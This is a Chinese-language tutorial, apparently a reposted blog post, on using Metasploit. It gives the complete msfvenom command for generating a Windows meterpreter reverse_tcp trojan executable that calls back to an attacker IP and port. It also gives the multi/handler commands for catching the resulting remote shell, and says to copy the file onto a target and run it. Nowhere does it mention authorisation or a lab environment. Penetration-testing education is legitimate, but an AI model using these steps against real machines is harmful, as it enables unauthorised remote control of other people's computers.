metasploit使用教程(安全工具Metasploit使用介绍)
Metasploit是kali系统自带的漏洞渗透工具,功能涵盖漏洞扫描、漏洞测试、漏洞攻击、后渗透攻击、脚本生成等模块,简单易用,容易上手,本文旨在抛开复杂难懂的背后理论知识,教给读者一个易于上手操作的软件使用方法,现在小编就来说说关于metasploit使用教程?下面内容希望能帮助到你,我们来一起看看吧!
metasploit使用教程
Metasploit是kali系统自带的漏洞渗透工具,功能涵盖漏洞扫描、漏洞测试、漏洞攻击、后渗透攻击、脚本生成等模块,简单易用,容易上手,本文旨在抛开复杂难懂的背后理论知识,教给读者一个易于上手操作的软件使用方法。
一、生成脚本
1、Metasploit生成脚本的命令为msfvenom,假定本机ip为10.10.10.61,本机连接端口为4444
在kali命令行界面输入:msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe -o ./vir.exe LHOST=10.10.10.61 LPORT=4444
以上命令可生成用于windows x86平台的木马脚本文件,后缀名为exe,将文件拷贝到目标机并运行,在攻击机监听状态会返回一个shell,在此shell下输入命令即可控制目标机,各项参数解释如下:
-p 指定payload,即在目标机上执行的操作
-a 指定架构
--platform 指定平台
-f 指定输出格式
-o 指定输出路径
LHOST 指定回连IP,即攻击机地址
LPORT 指定回连端口,即攻击机端口
以上参数可进行更改,在msf状态下输入msfvenom -l payloads/formats/platforms可查看支持的payloads、formats、platforms等。
二、设置监听状态
在目标机上运行以上生成的文件后,目标机会试图连接ip地址为10.10.10.61,端口4444的主机,因此,需要在攻击机上设置监听状态,以接受来自目标机的连接。
在kali的命令窗口输入msfconsole,等待片刻会进入msf的命令界面。依次输入以下命令:
use exploit/multi/handler #使用handle模块
set payload windows/meterpreter/reverse_tcp #设置payload
set LHOST 10.10.10.61 #设置本机ip
set LPORT 4444 #设置本机端口
run #开始监听
三、目标机连接到攻击机
在目标机运行exe文件后,攻击机会回弹一个meterpreter,在这个meterpreter下就可以用各种命令操纵目标机了。
下一节:meterpreter用法
,免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com